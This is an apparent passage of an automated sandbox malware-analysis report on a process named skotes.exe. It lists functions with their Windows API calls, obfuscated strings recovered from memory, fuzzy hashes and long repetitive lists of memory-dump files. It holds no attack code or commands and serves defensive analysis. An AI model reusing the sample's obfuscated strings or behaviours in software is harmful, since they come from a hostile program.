Opcode Fuzzy Hash: 7b148c2b003a97e8dea58f50b479de28e2281468cc8c79e687fd16a7839bb334
Instruction Fuzzy Hash: 8FA1E0B0A05305AFDB20DF75C844B6AB7B8FF59325F148269E815D7281EB31EA08CBD1

Function 0097CBDF Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0097CC66

Memory Dump Source

Source File: 00000002.00000002.1725053890.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000002.00000002.1724966816.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725053890.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725135977.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725154631.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725202801.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726505694.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726999851.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727138941.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727138941.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727347622.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727447955.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727463935.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727509744.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727541811.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727564744.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727657950.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727684532.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727701099.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727728553.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727751037.0000000000B62000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727767350.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727785108.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727800965.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727817001.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727837711.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727856845.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727872250.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727889948.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727907759.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727923278.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727940364.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727955443.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727970200.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727987984.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728004036.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728022848.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728037582.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728053959.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728068720.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728086440.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728101761.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728116754.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728132799.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728155347.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728171850.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728171850.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728213831.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728232513.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728247730.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728263275.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728278033.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728295927.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728313232.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
Instruction ID: efadfe54c9e70b0d6dc0c27bab602e9d9424d9b8d8426a3eaf09d19e8736dcc4
Opcode Fuzzy Hash: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
Instruction Fuzzy Hash: 9CB137B39046459FDB21CF68C8817AEBBE9EF45340F18C56EE859EB382D6348D01CB60

Function 0095BB72 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 0095BBCA
__Xtime_diff_to_millis2.LIBCPMT ref: 0095BBE4
_xtime_get.LIBCPMT ref: 0095BC07
__Xtime_diff_to_millis2.LIBCPMT ref: 0095BC13

Memory Dump Source

Source File: 00000002.00000002.1725053890.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000002.00000002.1724966816.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725053890.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725135977.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725154631.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725202801.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726505694.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726999851.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727138941.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727138941.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727347622.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727447955.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727463935.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727509744.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727541811.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727564744.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727657950.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727684532.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727701099.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727728553.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727751037.0000000000B62000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727767350.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727785108.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727800965.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727817001.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727837711.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727856845.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727872250.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727889948.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727907759.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727923278.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727940364.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727955443.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727970200.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727987984.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728004036.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728022848.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728037582.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728053959.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728068720.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728086440.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728101761.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728116754.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728132799.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728155347.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728171850.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728171850.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728213831.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728232513.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728247730.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728263275.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728278033.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728295927.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728313232.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: 67091ba3a43bf9a7d588eac261f2df8d20bc0bd5184da166b79394992e8c6d46
Instruction ID: a4d71d05d3e12cae4f0cac9860085e9e1e5c752bbe8618d145e928219d794e50
Opcode Fuzzy Hash: 67091ba3a43bf9a7d588eac261f2df8d20bc0bd5184da166b79394992e8c6d46
Instruction Fuzzy Hash: DE2162B1A00219AFDF00EFA9DC85ABEB7B9EF48711F100055FD01B7251DB74AD059BA0

Analysis Process: skotes.exePID: 3608, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	5.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1052
Total number of Limit Nodes:	91

Executed Functions

Function 0094E530 Relevance: 23.7, APIs: 2, Strings: 11, Instructions: 998
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

UA==, xrefs: 0094EB0F, 0094ED56
WTw=, xrefs: 0095097D
MGE+, xrefs: 0094E821
WDw=, xrefs: 0094F71D, 0094F9FA
MQ==, xrefs: 0094E592
GnNoc2Hc, xrefs: 0094E56C
111, xrefs: 0094F7A0
#, xrefs: 00950624
WTs=, xrefs: 009505CA
246122658369, xrefs: 0094F737, 0094FA14, 009505E7, 0095099A
9c9aa5, xrefs: 0094FB8E

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID:
String ID: #$111$246122658369$9c9aa5$GnNoc2Hc$MGE+$MQ==$UA==$WDw=$WTs=$WTw=
API String ID: 0-2571795437
Opcode ID: a1cbdfdb64a007dc57994cbee990cdc5f1c6427e3d46a03ef6f99449d97a9bc5
Instruction ID: f46b332a3f4cf47007927c0997c442f204f9f28fe2d6d84da4389ac4ee632006
Opcode Fuzzy Hash: a1cbdfdb64a007dc57994cbee990cdc5f1c6427e3d46a03ef6f99449d97a9bc5
Instruction Fuzzy Hash: 9C82C3709042889BEF14EF68C949BDEBFB5AF46304F508588E805673C2D7755A88CFD2

Function 009465E0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 257
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupAccountNameA.ADVAPI32(00000000,?,?,000000FF,?,?,?), ref: 00946680

Strings

RySfdMLx, xrefs: 0094669C
ISNmfV==, xrefs: 009467D1
GSTmfV==, xrefs: 00946728

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: AccountLookupName
String ID: GSTmfV==$ISNmfV==$RySfdMLx
API String ID: 1484870144-2309319047
Opcode ID: b5834852b095814bd708048a4006c5fb1c9d0fb5ae36f8182a6ad09bb41fe204
Instruction ID: 5b69a9d5f976c8a4ac3efe418d90e253b3c697d15174f255b6816cc09d519bcf
Opcode Fuzzy Hash: b5834852b095814bd708048a4006c5fb1c9d0fb5ae36f8182a6ad09bb41fe204
Instruction Fuzzy Hash: F991C0F19001189BDB28DB68CC85FEDB779EB86304F4045E9E51997282DA709BC8CFA5

Function 0094EB4E Relevance: 30.1, APIs: 3, Strings: 13, Instructions: 2131
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 0094EB51
CreateDirectoryA.KERNEL32(00000000), ref: 0094EC83
GetFileAttributesA.KERNEL32(00000000), ref: 0094ED98

Strings

UA==, xrefs: 0094EC41, 0094ED56, 0094EF89, 0094F2CE
WDw=, xrefs: 0094F71D, 0094F9FA, 0094FDE3
FisgLnsCZO1i, xrefs: 0094FF19
FCQgKF==, xrefs: 0094FEE4
111, xrefs: 0094F7A0
#, xrefs: 00950624
WTs=, xrefs: 009505CA
246122658369, xrefs: 0094F737, 0094FA14, 0094FE00, 009505E7
9c9aa5, xrefs: 0094FB8E
mxo1L0x, xrefs: 0094EE84
GiQaT29tduF=, xrefs: 0094FEB6
stoi argument out of range, xrefs: 009508C4
invalid stoi argument, xrefs: 009508B0

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
